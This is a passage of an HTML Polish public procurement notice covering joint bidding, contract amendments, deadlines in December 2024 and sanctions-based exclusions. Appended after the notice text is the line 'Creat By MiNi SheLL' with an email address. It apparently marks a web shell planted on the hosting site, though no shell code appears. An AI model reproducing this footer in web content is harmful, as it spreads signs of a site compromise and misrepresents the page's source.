oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w Rozdz. IX pkt 1 SWZ składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy - zgodnie z załącznikiem nr 4 do SWZ.<br/>4.	Oświadczenia potwierdzające brak podstaw wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań dotyczących zamówień na roboty budowlane lub usługi. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych w projektach umów, stanowiących odpowiednio dla poszczególnych zadań załącznik nr 9A, 9B, 9C do SWZ.<br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający dopuszcza zmiany umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia w zakresie wskazanym w projektach umów odpowiednio dla ZADANIA NR 1, ZADANIA NR 2, ZDANIA NR 3.<br/>4.	Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zimslupsk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-30 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Na podstawie art. 7 ust. 1 ustawy z dnia 13.04.2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego z postępowania prowadzonego na podstawie ustawy Pzp wyklucza się:<br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu Rady (WE) z dnia 18.05.2006r. 765/2006 i rozporządzeniu Rady (WE) z dnia 17.03.2014r. 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy,<br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 01.03.2018r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz.U. z 2023r. poz. 1124, 1285, 1723,i 1843) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24.02.2022r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy,<br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29.09.1994r. o rachunkowości (Dz. U. z 2023 r. poz. 120, 295 i 1598), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24.02.2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.<br/>Powyższe wykluczenie następuje na okres trwania okoliczności określonych w art. 7 ust. 1 ustawy z dnia 13.04.2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>W przypadku wykonawcy wykluczonego na podstawie art. 7 ust. 1 ustawy z dnia 13.04.2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, Zamawiający odrzuca ofertę takiego wykonawcy.<br/>Kontrola udzielania zamówień publicznych w zakresie zgodności z art. 7 ust. 1 ustawy z dnia 13.04.2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego będzie wykonywana zgodnie z art. 596 ustawy Pzp.<br/>Jako sankcję przewidziano również karę pieniężną nakładaną na osobę lub podmioty podlegające wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13.04.2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego lub dopuszczenie do udziału w konkursie lub biorą udział w postepowaniu o udzielenie zamówienia publicznego lub w konkursie. <br/>Przy czym, przez ubieganie się o udzielenie zamówienia publicznego lub dopuszczenie do udziału w konkursie rozumie się odpowiednio złożenie wniosku o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia publicznego lub konkursie, złożenie oferty, przystąpienie do negocjacji lub złożenie pracy konkursowej.<br/>2.	Zamawiający żąda wniesienia zabezpieczenia należytego wykonania umowy wyłącznie w zakresie ZADANIA NR 2 – „Wykonanie robót budowlanych w obrębie pasa drogowego”.

Creat By MiNi SheLL
Email: jattceo@gmail.com